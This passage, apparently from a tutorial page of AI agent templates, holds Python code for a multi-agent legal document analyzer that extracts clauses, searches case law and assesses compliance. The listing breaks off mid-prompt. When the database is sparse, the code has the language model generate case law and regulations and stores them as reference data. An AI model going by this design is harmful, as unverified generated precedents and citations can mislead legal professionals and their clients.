    for issue in insights['common_issues']:
        print(f"- {issue}")

This AI Customer Support agent template demonstrates key enterprise patterns:

  1. Specialized Agents: Different agents handle specific aspects of customer support (technical, billing, etc.)
  2. Sentiment Analysis: Tracks customer emotions to identify satisfaction issues
  3. Knowledge Management: Dynamically improves knowledge base from successful resolutions
  4. Ticket System Integration: Creates and updates support tickets based on conversations
  5. Continuous Learning: Extracts insights to identify common issues and knowledge gaps
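The knowledge management pattern (item 3) depends on a confidence gate: a suggested entry is written to the knowledge base only when the model's self-reported confidence clears a threshold. Below is a minimal sketch of that gate in isolation. It assumes the suggestion dictionary carries the `suggested_category`, `suggested_key`, `suggested_content`, and `confidence` fields requested by the extraction prompt; the helper name `apply_suggestion` and the plain in-memory dictionary are hypothetical stand-ins, not part of the template above.

```python
from typing import Any, Dict

# Same cutoff the template applies before trusting an extracted entry.
CONFIDENCE_THRESHOLD = 0.8


def apply_suggestion(
    knowledge_base: Dict[str, Dict[str, str]],
    suggestion: Dict[str, Any],
    threshold: float = CONFIDENCE_THRESHOLD,
) -> bool:
    """Write a suggested entry into the knowledge base if it passes the gate.

    Returns True when the entry was written and False when it was rejected.
    `apply_suggestion` is a hypothetical helper used for illustration only.
    """
    confidence = suggestion.get("confidence", 0)
    # Reject non-numeric or below-threshold confidence values.
    if not isinstance(confidence, (int, float)) or confidence < threshold:
        return False

    category = suggestion.get("suggested_category")
    key = suggestion.get("suggested_key")
    content = suggestion.get("suggested_content")
    # All three fields must be present and non-empty.
    if not (category and key and content):
        return False

    # Create the category on first use, then add or overwrite the entry.
    knowledge_base.setdefault(category, {})[key] = content
    return True
```

Keeping the gate as a pure function over a dictionary makes it straightforward to unit test without calling the model, and the threshold can be tuned per category if some areas need stricter review.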

AI-Powered Legal Document Analyzer (Case Law Research & Compliance)

This AI agent template is designed to analyze legal documents, extract key information, identify relevant precedents, and assess compliance requirements. It provides legal professionals with comprehensive document analysis and research capabilities.

Core Capabilities:

  • Legal document parsing and clause extraction
  • Case law research and precedent identification
  • Compliance requirement analysis
  • Risk assessment and issue spotting
  • Legal summary and recommendation generation
  • Citation verification and validation
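To illustrate the citation verification capability, the sketch below extracts reporter citations from text with a regular expression and checks each one against a lookup table. It is a simplified sketch under stated assumptions: the pattern covers only a handful of U.S. reporters, and `KNOWN_CITATIONS`, `extract_citations`, and `verify_citations` are hypothetical names, not part of the analyzer implemented in this section. A production system would validate against an authoritative citation database instead of a hard-coded table.

```python
import re
from typing import Dict, List

# Matches "<volume> <reporter> <page>" for a few U.S. reporters only.
# Real citation formats are far more varied; this pattern is illustrative.
CITATION_PATTERN = re.compile(
    r"\b(\d{1,3})\s+(U\.S\.|S\. Ct\.|F\.2d|F\.3d)\s+(\d{1,4})\b"
)

# Hypothetical lookup table standing in for a case law citation index.
KNOWN_CITATIONS: Dict[str, str] = {
    "410 U.S. 113": "Roe v. Wade",
    "347 U.S. 483": "Brown v. Board of Education",
}


def extract_citations(text: str) -> List[str]:
    """Return normalized citation strings in the order they appear."""
    return [
        f"{volume} {reporter} {page}"
        for volume, reporter, page in CITATION_PATTERN.findall(text)
    ]


def verify_citations(text: str, known: Dict[str, str]) -> Dict[str, bool]:
    """Map each extracted citation to whether it appears in `known`."""
    return {citation: citation in known for citation in extract_citations(text)}


if __name__ == "__main__":
    # "1 F.3d 9999" is a deliberately made-up citation used as a negative case.
    sample = "See Brown v. Board of Education, 347 U.S. 483 (1954), and 1 F.3d 9999."
    print(verify_citations(sample, KNOWN_CITATIONS))
```

Separating extraction from verification lets the lookup source be swapped (for example, for the `citations` section of a case law database) without touching the parsing logic.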

Architecture:

[Figure: Legal Document Analyzer Architecture]

Implementation Example:

python
# legal_document_analyzer.py
import os
import json
import datetime
import uuid
import re
import pandas as pd
import numpy as np
import autogen
import openai
from typing import Dict, List, Any, Optional, Union, Tuple

# Configure API keys and settings
OPENAI_API_KEY = os.environ.get("OPENAI_API_KEY", "your-api-key")

# Initialize OpenAI client
client = openai.OpenAI(api_key=OPENAI_API_KEY)

class LegalDocumentAnalyzer:
    """
    An AI-powered legal document analyzer that extracts information, identifies
    precedents, and assesses compliance requirements.
    """

    def __init__(self, config=None):
        """
        Initialize the Legal Document Analyzer.

        Args:
            config: Optional configuration dictionary
        """
        self.config = config or {}

        # Case law database file path
        self.case_law_db_path = self.config.get("case_law_db_path", "case_law_database.json")

        # Load case law database if it exists, otherwise create an empty one
        self.case_law_db = self._load_case_law_db()

        # Compliance requirements database file path
        self.compliance_db_path = self.config.get("compliance_db_path", "compliance_database.json")

        # Load compliance database if it exists, otherwise create an empty one
        self.compliance_db = self._load_compliance_db()

        # Document analysis history
        self.analysis_history = {}

        # Load analysis history if available
        self.history_path = self.config.get("history_path", "analysis_history.json")
        if os.path.exists(self.history_path):
            try:
                with open(self.history_path, 'r') as f:
                    self.analysis_history = json.load(f)
            except Exception as e:
                print(f"Error loading analysis history: {e}")

        # Set up agent configuration
        self.llm_config = {
            "config_list": [{"model": "gpt-4-turbo", "api_key": OPENAI_API_KEY}],
            "temperature": 0.2,
            "timeout": 180
        }

        # Create the agent team
        self._create_agent_team()

    def _load_case_law_db(self) -> Dict:
        """
        Load the case law database from a JSON file.

        Returns:
            Dictionary containing the case law database
        """
        if os.path.exists(self.case_law_db_path):
            try:
                with open(self.case_law_db_path, 'r') as f:
                    return json.load(f)
            except Exception as e:
                print(f"Error loading case law database: {e}")

        # If file doesn't exist or has errors, initialize with empty structure
        return {
            "cases": {},
            "jurisdictions": {},
            "areas_of_law": {},
            "citations": {}
        }

    def _load_compliance_db(self) -> Dict:
        """
        Load the compliance requirements database from a JSON file.

        Returns:
            Dictionary containing the compliance database
        """
        if os.path.exists(self.compliance_db_path):
            try:
                with open(self.compliance_db_path, 'r') as f:
                    return json.load(f)
            except Exception as e:
                print(f"Error loading compliance database: {e}")

        # If file doesn't exist or has errors, initialize with empty structure
        return {
            "regulations": {},
            "jurisdictions": {},
            "industries": {},
            "requirements": {}
        }

112 def save_case_law_db(self):
113 """Save the case law database to a JSON file."""
114 try:
115 with open(self.case_law_db_path, 'w') as f:
116 json.dump(self.case_law_db, f, indent=2)
117 print("Case law database saved successfully")
118 except Exception as e:
119 print(f"Error saving case law database: {e}")
120
121 def save_compliance_db(self):
122 """Save the compliance database to a JSON file."""
123 try:
124 with open(self.compliance_db_path, 'w') as f:
125 json.dump(self.compliance_db, f, indent=2)
126 print("Compliance database saved successfully")
127 except Exception as e:
128 print(f"Error saving compliance database: {e}")
129
130 def _create_agent_team(self):
131 """Create the team of specialized agents for legal document analysis."""
132
133 # 1. Document Parser - Specialized in extracting structured information from legal documents
134 self.document_parser = autogen.AssistantAgent(
135 name="DocumentParser",
136 system_message="""You are an expert legal document parser who specializes in extracting structured
137 information from legal documents of all types.
138
139 Your responsibilities:
140 1. Extract key information from legal documents (contracts, legislation, case law, etc.)
141 2. Identify and categorize legal clauses and provisions
142 3. Recognize parties, dates, obligations, and other critical elements
143 4. Identify the document type and purpose
144 5. Detect jurisdiction and governing law
145
146 Be thorough, precise, and comprehensive in your extraction. Focus on identifying the complete
147 structure of the document including sections, clauses, and subclauses. Recognize legal terminology
148 accurately. Maintain the hierarchical relationships between different parts of the document.
149 Extract all relevant metadata such as dates, parties, jurisdictions, and subject matter.""",
150 llm_config=self.llm_config
151 )
152
153 # 2. Legal Researcher - Specialized in case law and precedent research
154 self.legal_researcher = autogen.AssistantAgent(
155 name="LegalResearcher",
156 system_message="""You are an expert legal researcher who specializes in finding relevant
157 case law, statutes, regulations, and legal precedents.
158
159 Your responsibilities:
160 1. Identify relevant legal authorities based on document content
161 2. Find and analyze case law precedents that may impact interpretation
162 3. Research statutes and regulations applicable to the document
163 4. Examine how courts have interpreted similar language or provisions
164 5. Identify potential conflicts between the document and existing law
165
166 Be thorough, precise, and focused on finding the most relevant legal authorities. Consider
167 different jurisdictions when appropriate. Provide accurate citations for all legal authorities.
168 Analyze how courts have interpreted similar provisions. Consider both supporting and contradicting
169 precedents. Evaluate the strength and applicability of different legal authorities.""",
170 llm_config=self.llm_config
171 )
172
173 # 3. Compliance Analyst - Specialized in compliance requirements
174 self.compliance_analyst = autogen.AssistantAgent(
175 name="ComplianceAnalyst",
176 system_message="""You are an expert compliance analyst who specializes in identifying
177 regulatory requirements and assessing documents for compliance issues.
178
179 Your responsibilities:
180 1. Identify applicable regulations and compliance requirements
181 2. Assess whether the document meets regulatory standards
182 3. Flag potential compliance issues or violations
183 4. Recommend changes to address compliance concerns
184 5. Analyze industry-specific regulatory considerations
185
186 Be thorough, detail-oriented, and comprehensive in your compliance analysis. Consider
187 multiple jurisdictions and regulatory frameworks. Identify both explicit compliance issues
188 and potential gray areas. Provide specific references to relevant regulations. Consider
189 industry-specific compliance requirements. Evaluate both the letter and spirit of regulations.""",
190 llm_config=self.llm_config
191 )
192
193 # 4. Issue Spotter - Specialized in identifying legal risks and issues
194 self.issue_spotter = autogen.AssistantAgent(
195 name="IssueSpotter",
196 system_message="""You are an expert legal issue spotter who specializes in identifying
197 potential legal risks, ambiguities, and problematic provisions in legal documents.
198
199 Your responsibilities:
200 1. Identify ambiguous language or provisions that could lead to disputes
201 2. Spot potential legal risks or liabilities
202 3. Detect missing provisions or protections
203 4. Analyze enforceability concerns
204 5. Identify conflicts between different parts of the document
205
206 Be thorough, critical, and anticipate potential problems. Look for ambiguities in language
207 that could be interpreted in multiple ways. Identify provisions that may be unenforceable.
208 Consider practical implementation challenges. Look for missing provisions that should be
209 included. Identify protections that would benefit each party. Consider worst-case scenarios
210 and how the document would apply.""",
211 llm_config=self.llm_config
212 )
213
214 # 5. Legal Summarizer - Specialized in creating comprehensive legal summaries
215 self.legal_summarizer = autogen.AssistantAgent(
216 name="LegalSummarizer",
217 system_message="""You are an expert legal summarizer who specializes in creating clear,
218 comprehensive summaries of complex legal documents and analyses.
219
220 Your responsibilities:
221 1. Synthesize key information from legal documents into clear summaries
222 2. Highlight the most important provisions, risks, and considerations
223 3. Organize information logically and hierarchically
224 4. Translate complex legal concepts into accessible language
225 5. Create executive summaries for non-legal audiences when needed
226
227 Be comprehensive while focusing on what matters most. Structure your summaries logically
228 with clear sections and headings. Use precise language while avoiding unnecessary legal
229 jargon. Distinguish between major and minor points. Include all critical information while
230 being concise. Create different levels of detail appropriate for different audiences.""",
231 llm_config=self.llm_config
232 )
233
234 # User proxy agent for orchestrating the workflow
235 self.user_proxy = autogen.UserProxyAgent(
236 name="LegalAnalysisCoordinator",
237 human_input_mode="NEVER",
238 code_execution_config=False,
239 system_message="""You are a coordinator for legal document analysis.
240 Your role is to manage the flow of information between the specialized legal agents.
241 You help distribute document content to the right specialists and compile their insights."""
242 )
243
244 def extract_document_structure(self, document_text: str) -> Dict[str, Any]:
245 """
246 Extract structured information from a legal document.
247
248 Args:
249 document_text: Text content of the legal document
250
251 Returns:
252 Dictionary with structured document information
253 """
254 try:
255 # Use OpenAI to extract document structure
256 response = client.chat.completions.create(
257 model="gpt-4-turbo",
258 messages=[
259 {"role": "system", "content": "You are a legal document structure extraction specialist. Extract the hierarchical structure and key metadata from legal documents."},
260 {"role": "user", "content": f"Extract the structure and metadata from this legal document. Return a JSON object with document_type, jurisdiction, date, parties, governing_law, and hierarchical structure (sections, clauses, sub-clauses). For each structural element, include the heading/number and a brief description of the content.\n\nDocument text:\n\n{document_text[:15000]}"}
261 ],
262 temperature=0.2,
263 response_format={"type": "json_object"}
264 )
265
266 # Parse the response
267 structure = json.loads(response.choices[0].message.content)
268
269 return structure
270
271 except Exception as e:
272 print(f"Error extracting document structure: {e}")
273 return {
274 "document_type": "Unknown",
275 "error": str(e),
276 "partial_text": document_text[:100] + "..."
277 }
278
279 def extract_legal_entities(self, document_text: str) -> Dict[str, List[Dict[str, Any]]]:
280 """
281 Extract legal entities from document text.
282
283 Args:
284 document_text: Text content of the legal document
285
286 Returns:
287 Dictionary with extracted entities by category
288 """
289 try:
290 # Use OpenAI to extract legal entities
291 response = client.chat.completions.create(
292 model="gpt-4-turbo",
293 messages=[
294 {"role": "system", "content": "You are a legal entity extraction specialist who identifies parties, jurisdictions, legal references, dates, and key terms in legal documents."},
295 {"role": "user", "content": f"Extract all legal entities from this document. Return a JSON object with these categories: parties (individuals and organizations), jurisdictions, legal_references (statutes, cases, regulations), dates (with context), monetary_values, and defined_terms.\n\nFor each entity, include the entity text, category, context (surrounding text), and a confidence score (0-1).\n\nDocument text:\n\n{document_text[:15000]}"}
296 ],
297 temperature=0.2,
298 response_format={"type": "json_object"}
299 )
300
301 # Parse the response
302 entities = json.loads(response.choices[0].message.content)
303
304 return entities
305
306 except Exception as e:
307 print(f"Error extracting legal entities: {e}")
308 return {
309 "parties": [],
310 "jurisdictions": [],
311 "legal_references": [],
312 "dates": [],
313 "monetary_values": [],
314 "defined_terms": [],
315 "error": str(e)
316 }
317
318 def identify_obligations_and_rights(self, document_text: str) -> Dict[str, List[Dict[str, Any]]]:
319 """
320 Identify obligations, rights, and permissions in the document.
321
322 Args:
323 document_text: Text content of the legal document
324
325 Returns:
326 Dictionary with obligations, rights, permissions, and prohibitions
327 """
328 try:
329 # Use OpenAI to identify obligations and rights
330 response = client.chat.completions.create(
331 model="gpt-4-turbo",
332 messages=[
333 {"role": "system", "content": "You are a legal rights and obligations specialist who identifies commitments, permissions, prohibitions, and conditions in legal documents."},
334 {"role": "user", "content": f"Identify all obligations, rights, permissions, and prohibitions in this legal document. Return a JSON object with these categories: obligations (must do), rights (entitled to), permissions (may do), and prohibitions (must not do).\n\nFor each item, include the text, the subject (who it applies to), the object (what it applies to), any conditions, and the location in the document.\n\nDocument text:\n\n{document_text[:15000]}"}
335 ],
336 temperature=0.2,
337 response_format={"type": "json_object"}
338 )
339
340 # Parse the response
341 rights_obligations = json.loads(response.choices[0].message.content)
342
343 return rights_obligations
344
345 except Exception as e:
346 print(f"Error identifying obligations and rights: {e}")
347 return {
348 "obligations": [],
349 "rights": [],
350 "permissions": [],
351 "prohibitions": [],
352 "error": str(e)
353 }
354
355 def search_case_law(self, query: str, jurisdiction: str = None, limit: int = 5) -> List[Dict[str, Any]]:
356 """
357 Search for relevant case law based on query.
358
359 Args:
360 query: Search query
361 jurisdiction: Optional jurisdiction filter
362 limit: Maximum number of results
363
364 Returns:
365 List of relevant case law entries
366 """
367 results = []
368
369 # If we have a small or empty database, use OpenAI to generate relevant case law
370 if len(self.case_law_db.get("cases", {})) < 10:
371 try:
                # Ask the model for candidate precedents. JSON mode yields a JSON object
                # rather than a bare array, so request the array under a top-level key.
                response = client.chat.completions.create(
                    model="gpt-4-turbo",
                    messages=[
                        {"role": "system", "content": "You are a legal research specialist with expertise in case law across multiple jurisdictions."},
                        {"role": "user", "content": f"Find {limit} relevant case law precedents for this legal question or issue. If a specific jurisdiction is mentioned, prioritize cases from that jurisdiction.\n\nQuery: {query}\nJurisdiction: {jurisdiction if jurisdiction else 'Any'}\n\nFor each case, provide the case name, citation, jurisdiction, year, key holdings, and relevance to the query. Return a JSON object with a top-level 'cases' array."}
                    ],
                    temperature=0.2,
                    response_format={"type": "json_object"}
                )

                # Parse the response
                case_law = json.loads(response.choices[0].message.content)

                # Unwrap the cases array (falling back to the first list found), then drop
                # anything that is not a case object so the loop below can call .get() safely
                if isinstance(case_law, dict):
                    case_law = case_law.get("cases") or next(
                        (value for value in case_law.values() if isinstance(value, list)), []
                    )
                case_law = [case for case in case_law if isinstance(case, dict)]
389
390 # Add generated cases to the database
391 for case in case_law:
392 case_id = str(uuid.uuid4())
393 self.case_law_db["cases"][case_id] = case
394
395 # Add to jurisdictions index
396 case_jurisdiction = case.get("jurisdiction", "Unknown")
397 if case_jurisdiction not in self.case_law_db["jurisdictions"]:
398 self.case_law_db["jurisdictions"][case_jurisdiction] = []
399 self.case_law_db["jurisdictions"][case_jurisdiction].append(case_id)
400
401 # Add to areas of law index
402 areas = case.get("areas_of_law", [])
403 if isinstance(areas, str):
404 areas = [areas]
405
406 for area in areas:
407 if area not in self.case_law_db["areas_of_law"]:
408 self.case_law_db["areas_of_law"][area] = []
409 self.case_law_db["areas_of_law"][area].append(case_id)
410
411 # Add to citations index
412 citation = case.get("citation", "")
413 if citation:
414 self.case_law_db["citations"][citation] = case_id
415
416 # Save the updated database
417 self.save_case_law_db()
418
419 return case_law
420
421 except Exception as e:
422 print(f"Error generating case law: {e}")
423 return []
424
425 # Search the existing database
426 # This is a simplified search - in a real application, this would use vector embeddings
427 # and more sophisticated matching
428
429 # First, search by jurisdiction if specified
430 jurisdiction_cases = []
431 if jurisdiction and jurisdiction in self.case_law_db.get("jurisdictions", {}):
432 jurisdiction_case_ids = self.case_law_db["jurisdictions"][jurisdiction]
433 jurisdiction_cases = [self.case_law_db["cases"][case_id] for case_id in jurisdiction_case_ids if case_id in self.case_law_db["cases"]]
434
435 # If no jurisdiction specified or no cases found, use all cases
436 search_cases = jurisdiction_cases if jurisdiction_cases else list(self.case_law_db["cases"].values())
437
        # Split the query into lowercase terms for case-insensitive matching
        query_terms = query.lower().split()

        # Filter cases by relevance to query
        for case in search_cases:
            # Check if query terms appear in case name, holdings, or summary.
            # Fields pass through str() because generated entries may hold lists.
            case_text = " ".join(
                str(case.get(field, "")) for field in ("case_name", "key_holdings", "summary")
            ).lower()
            case_words = case_text.split()
            if not query_terms or not case_words:
                continue

            # Calculate a simple relevance score based on term frequency
            term_hits = sum(case_text.count(term) for term in query_terms)
            if term_hits:
                results.append({
                    **case,
                    "relevance_score": term_hits / len(case_words)
                })
458
459 # Sort by relevance and limit results
460 results.sort(key=lambda x: x.get("relevance_score", 0), reverse=True)
461 return results[:limit]
462
463 def identify_applicable_regulations(self, document_text: str, jurisdiction: str = None, industry: str = None) -> List[Dict[str, Any]]:
464 """
465 Identify regulations that may apply to the document.
466
467 Args:
468 document_text: Text content of the legal document
469 jurisdiction: Optional jurisdiction filter
470 industry: Optional industry filter
471
472 Returns:
473 List of applicable regulations with compliance considerations
474 """
475 # If we have a small or empty database, use OpenAI to generate applicable regulations
476 if len(self.compliance_db.get("regulations", {})) < 10:
477 try:
                # Extract document type and key elements first
                doc_structure = self.extract_document_structure(document_text)
                doc_type = doc_structure.get("document_type", "Unknown")
                # Prefer the caller's jurisdiction; fall back to the one detected in the document
                doc_jurisdiction = jurisdiction or doc_structure.get("jurisdiction")
482
483 # Generate applicable regulations using OpenAI
484 prompt = f"""Identify regulations that apply to this {doc_type} document"""
485 if doc_jurisdiction:
486 prompt += f" in {doc_jurisdiction}"
487 if industry:
488 prompt += f" for the {industry} industry"
489
490 prompt += f""". The document contains the following key elements:
491
492 Document Type: {doc_type}
493 Jurisdiction: {doc_jurisdiction if doc_jurisdiction else 'Unknown'}
494 Industry: {industry if industry else 'Unknown'}
495
496 For each regulation, provide:
497 1. The full name and common abbreviation
498 2. Jurisdiction
499 3. Key compliance requirements relevant to this document
500 4. Specific sections of the regulation that apply
501 5. Risk level for non-compliance (High, Medium, Low)
502
                Return a JSON object with a top-level "regulations" array.
504
505 Document excerpt:
506 {document_text[:2000]}...
507 """
508
509 response = client.chat.completions.create(
510 model="gpt-4-turbo",
511 messages=[
512 {"role": "system", "content": "You are a legal compliance specialist with expertise in regulatory requirements across multiple jurisdictions and industries."},
513 {"role": "user", "content": prompt}
514 ],
515 temperature=0.2,
516 response_format={"type": "json_object"}
517 )
518
519 # Parse the response
520 regulations = json.loads(response.choices[0].message.content)
521
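                # Unwrap the regulations array (falling back to the first list found), then drop
                # anything that is not a regulation object so the loop below can call .get() safely
                if isinstance(regulations, dict):
                    regulations = regulations.get("regulations") or next(
                        (value for value in regulations.values() if isinstance(value, list)), []
                    )
                regulations = [reg for reg in regulations if isinstance(reg, dict)]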
525
526 # Add generated regulations to the database
527 for regulation in regulations:
528 regulation_id = str(uuid.uuid4())
529 self.compliance_db["regulations"][regulation_id] = regulation
530
531 # Add to jurisdictions index
532 reg_jurisdiction = regulation.get("jurisdiction", "Unknown")
533 if reg_jurisdiction not in self.compliance_db["jurisdictions"]:
534 self.compliance_db["jurisdictions"][reg_jurisdiction] = []
535 self.compliance_db["jurisdictions"][reg_jurisdiction].append(regulation_id)
536
537 # Add to industries index if applicable
538 if industry:
539 if industry not in self.compliance_db["industries"]:
540 self.compliance_db["industries"][industry] = []
541 self.compliance_db["industries"][industry].append(regulation_id)
542
543 # Save the updated database
544 self.save_compliance_db()
545
546 return regulations
547
548 except Exception as e:
549 print(f"Error identifying applicable regulations: {e}")
550 return []
551
552 # Search the existing database
553 # This is a simplified search - in a real application, this would use more sophisticated matching
554
555 # Filter by jurisdiction if specified
556 jurisdiction_regulations = []
557 if jurisdiction and jurisdiction in self.compliance_db.get("jurisdictions", {}):
558 jurisdiction_reg_ids = self.compliance_db["jurisdictions"][jurisdiction]
559 jurisdiction_regulations = [self.compliance_db["regulations"][reg_id] for reg_id in jurisdiction_reg_ids if reg_id in self.compliance_db["regulations"]]
560
561 # Filter by industry if specified
562 industry_regulations = []
563 if industry and industry in self.compliance_db.get("industries", {}):
564 industry_reg_ids = self.compliance_db["industries"][industry]
565 industry_regulations = [self.compliance_db["regulations"][reg_id] for reg_id in industry_reg_ids if reg_id in self.compliance_db["regulations"]]
566
567 # If both filters specified, find intersection
568 if jurisdiction and industry:
569 results = [reg for reg in jurisdiction_regulations if reg in industry_regulations]
570 elif jurisdiction:
571 results = jurisdiction_regulations
572 elif industry:
573 results = industry_regulations
574 else:
575 # If no filters, return all regulations
576 results = list(self.compliance_db["regulations"].values())
577
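        # Sort by risk level, highest first; unrecognized or missing levels are treated as Medium
        # (this would be more sophisticated in a real application)
        risk_order = {"high": 0, "medium": 1, "low": 2}
        results.sort(key=lambda reg: risk_order.get(str(reg.get("risk_level", "Medium")).lower(), 1))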
580
581 return results
582
583 def assess_compliance(self, document_text: str, regulations: List[Dict[str, Any]]) -> Dict[str, Any]:
584 """
585 Assess document compliance with specified regulations.
586
587 Args:
588 document_text: Text content of the legal document
589 regulations: List of regulations to assess against
590
591 Returns:
592 Compliance assessment with issues and recommendations
593 """
594 try:
595 # Prepare regulations for the prompt
596 regulations_text = json.dumps(regulations, indent=2)
597
598 # Use OpenAI to assess compliance
599 response = client.chat.completions.create(
600 model="gpt-4-turbo",
601 messages=[
602 {"role": "system", "content": "You are a legal compliance specialist who assesses documents for regulatory compliance issues."},
603 {"role": "user", "content": f"Assess this legal document for compliance with the specified regulations. Identify compliance issues, their severity, and provide specific recommendations for addressing each issue.\n\nRegulations to assess against:\n{regulations_text}\n\nDocument text:\n{document_text[:10000]}"}
604 ],
605 temperature=0.2,
606 response_format={"type": "json_object"}
607 )
608
609 # Parse the response
610 assessment = json.loads(response.choices[0].message.content)
611
612 return assessment
613
614 except Exception as e:
615 print(f"Error assessing compliance: {e}")
616 return {
617 "compliance_score": 0,
618 "issues": [],
619 "recommendations": [],
620 "error": str(e)
621 }
622
623 def identify_legal_issues(self, document_text: str, document_type: str = None) -> Dict[str, Any]:
624 """
625 Identify potential legal issues and risks in the document.
626
627 Args:
628 document_text: Text content of the legal document
629 document_type: Optional document type for context
630
631 Returns:
632 Dictionary with identified issues, risks, and recommendations
633 """
634 try:
635 # Use OpenAI to identify legal issues
636 prompt = "Identify potential legal issues, risks, and ambiguities in this document."
637 if document_type:
638 prompt += f" This is a {document_type} document."
639
640 prompt += f"\n\nFor each issue, provide:\n1. Issue description\n2. Severity (High, Medium, Low)\n3. Location in the document\n4. Potential consequences\n5. Recommended remediation\n\nDocument text:\n{document_text[:10000]}"
641
642 response = client.chat.completions.create(
643 model="gpt-4-turbo",
644 messages=[
645 {"role": "system", "content": "You are a legal risk assessment specialist who identifies potential issues, ambiguities, and risks in legal documents."},
646 {"role": "user", "content": prompt}
647 ],
648 temperature=0.3,
649 response_format={"type": "json_object"}
650 )
651
652 # Parse the response
653 issues = json.loads(response.choices[0].message.content)
654
655 return issues
656
657 except Exception as e:
658 print(f"Error identifying legal issues: {e}")
659 return {
660 "issues": [],
661 "overall_risk_level": "Unknown",
662 "error": str(e)
663 }
664
665 def generate_document_summary(self, document_text: str, analysis_results: Dict[str, Any]) -> Dict[str, Any]:
666 """
667 Generate a comprehensive summary of the document and analysis.
668
669 Args:
670 document_text: Text content of the legal document
671 analysis_results: Results from previous analysis steps
672
673 Returns:
674 Dictionary with executive summary and detailed summary
675 """
676 try:
677 # Prepare analysis results for the prompt
678 analysis_text = json.dumps(analysis_results, indent=2)
679
680 # Use OpenAI to generate summary
681 response = client.chat.completions.create(
682 model="gpt-4-turbo",
683 messages=[
684 {"role": "system", "content": "You are a legal document summarization specialist who creates clear, comprehensive summaries of legal documents and their analysis."},
685 {"role": "user", "content": f"Create a comprehensive summary of this legal document based on the document text and analysis results. Include both an executive summary (brief overview for non-legal audience) and a detailed summary (comprehensive analysis for legal professionals).\n\nAnalysis results:\n{analysis_text}\n\nDocument text:\n{document_text[:5000]}"}
686 ],
687 temperature=0.3,
688 response_format={"type": "json_object"}
689 )
690
691 # Parse the response
692 summary = json.loads(response.choices[0].message.content)
693
694 return summary
695
696 except Exception as e:
697 print(f"Error generating document summary: {e}")
698 return {
699 "executive_summary": "Error generating summary",
700 "detailed_summary": f"Error: {str(e)}",
701 "error": str(e)
702 }
703
704 def verify_citations(self, document_text: str) -> Dict[str, Any]:
705 """
706 Verify legal citations in the document.
707
708 Args:
709 document_text: Text content of the legal document
710
711 Returns:
712 Dictionary with verification results for each citation
713 """
714 try:
715 # Use OpenAI to extract and verify citations
716 response = client.chat.completions.create(
717 model="gpt-4-turbo",
718 messages=[
719 {"role": "system", "content": "You are a legal citation specialist who extracts and verifies legal citations in documents."},
720 {"role": "user", "content": f"Extract and verify all legal citations in this document. For each citation, identify:\n1. The citation text\n2. Citation type (case, statute, regulation, etc.)\n3. Whether the citation appears to be valid, formatted correctly, and used in the proper context\n4. Any issues or corrections needed\n\nReturn as a JSON object with an array of citations.\n\nDocument text:\n{document_text[:15000]}"}
721 ],
722 temperature=0.2,
723 response_format={"type": "json_object"}
724 )
725
726 # Parse the response
727 citations = json.loads(response.choices[0].message.content)
728
729 return citations
730
731 except Exception as e:
732 print(f"Error verifying citations: {e}")
733 return {
734 "citations": [],
735 "error": str(e)
736 }
737
738 def analyze_document(self, document_text: str, document_type: str = None, jurisdiction: str = None, industry: str = None) -> Dict[str, Any]:
739 """
740 Perform comprehensive analysis of a legal document.
741
742 Args:
743 document_text: Text content of the legal document
744 document_type: Optional document type
745 jurisdiction: Optional jurisdiction
746 industry: Optional industry context
747
748 Returns:
749 Dictionary with comprehensive document analysis
750 """
751 # Generate a unique analysis ID
752 analysis_id = f"ANALYSIS-{uuid.uuid4().hex[:8]}"
753
        # Create group chat for agent collaboration
        groupchat = autogen.GroupChat(
            agents=[
                self.user_proxy,
                self.document_parser,
                self.legal_researcher,
                self.compliance_analyst,
                self.issue_spotter,
                self.legal_summarizer
            ],
            messages=[],
            max_round=15
        )

        # The manager needs its own LLM config to select the next speaker
        manager = autogen.GroupChatManager(groupchat=groupchat, llm_config=self.llm_config)
769
770 # Step 1: Extract document structure
771 structure = self.extract_document_structure(document_text)
772
773 # If document_type wasn't provided, use the one from structure analysis
774 if not document_type and "document_type" in structure:
775 document_type = structure.get("document_type")
776
777 # If jurisdiction wasn't provided, use the one from structure analysis
778 if not jurisdiction and "jurisdiction" in structure:
779 jurisdiction = structure.get("jurisdiction")
780
781 # Step 2: Extract legal entities
782 entities = self.extract_legal_entities(document_text)
783
784 # Step 3: Identify obligations and rights
785 rights_obligations = self.identify_obligations_and_rights(document_text)
786
787 # Step 4: Search for relevant case law
788 # Create a search query based on document type and key entities
789 search_query = f"{document_type if document_type else 'legal document'}"
790 if jurisdiction:
791 search_query += f" {jurisdiction}"
792 if "key_topics" in structure:
793 topics = structure.get("key_topics", [])
794 if isinstance(topics, list) and topics:
795 search_query += f" {' '.join(topics[:3])}"
796
797 case_law = self.search_case_law(search_query, jurisdiction=jurisdiction)
798
799 # Step 5: Identify applicable regulations
800 regulations = self.identify_applicable_regulations(document_text, jurisdiction=jurisdiction, industry=industry)
801
802 # Step 6: Assess compliance
803 compliance = self.assess_compliance(document_text, regulations)
804
805 # Step 7: Identify legal issues and risks
806 issues = self.identify_legal_issues(document_text, document_type=document_type)
807
808 # Prepare analysis data for the agents
809 document_excerpt = document_text[:3000] + ("..." if len(document_text) > 3000 else "")
810
811 analysis_data = {
812 "document_structure": structure,
813 "entities": entities,
814 "rights_obligations": rights_obligations,
815 "case_law": case_law,
816 "regulations": regulations,
817 "compliance": compliance,
818 "issues": issues
819 }
820
821 # Convert analysis data to a readable format for the prompt
822 analysis_summary = json.dumps(analysis_data, indent=2)
823
824 # Generate initial prompt for the agent team
825 analysis_prompt = f"""
826 LEGAL DOCUMENT ANALYSIS
827 Analysis ID: {analysis_id}
828 Document Type: {document_type if document_type else 'Unknown'}
829 Jurisdiction: {jurisdiction if jurisdiction else 'Unknown'}
830 Industry: {industry if industry else 'Unknown'}
831
832 I need your collaborative analysis of this legal document. Initial automated analysis has identified the following:
833
834 DOCUMENT STRUCTURE:
835 Type: {structure.get('document_type', 'Unknown')}
836 Jurisdiction: {structure.get('jurisdiction', 'Unknown')}
837 Date: {structure.get('date', 'Unknown')}
838 Parties: {', '.join(str(p) for p in structure.get('parties', []))}
839
840 DOCUMENT EXCERPT:
841 {document_excerpt}
842
843 DETAILED ANALYSIS RESULTS:
844 {analysis_summary}
845
846 I need the team to work together to provide:
847 1. DocumentParser: Analyze the document structure and identify key provisions
848 2. LegalResearcher: Analyze relevant case law and legal precedents
849 3. ComplianceAnalyst: Evaluate regulatory compliance issues
850 4. IssueSpotter: Identify legal risks and potential issues
851 5. LegalSummarizer: Create a comprehensive yet concise summary of findings
852
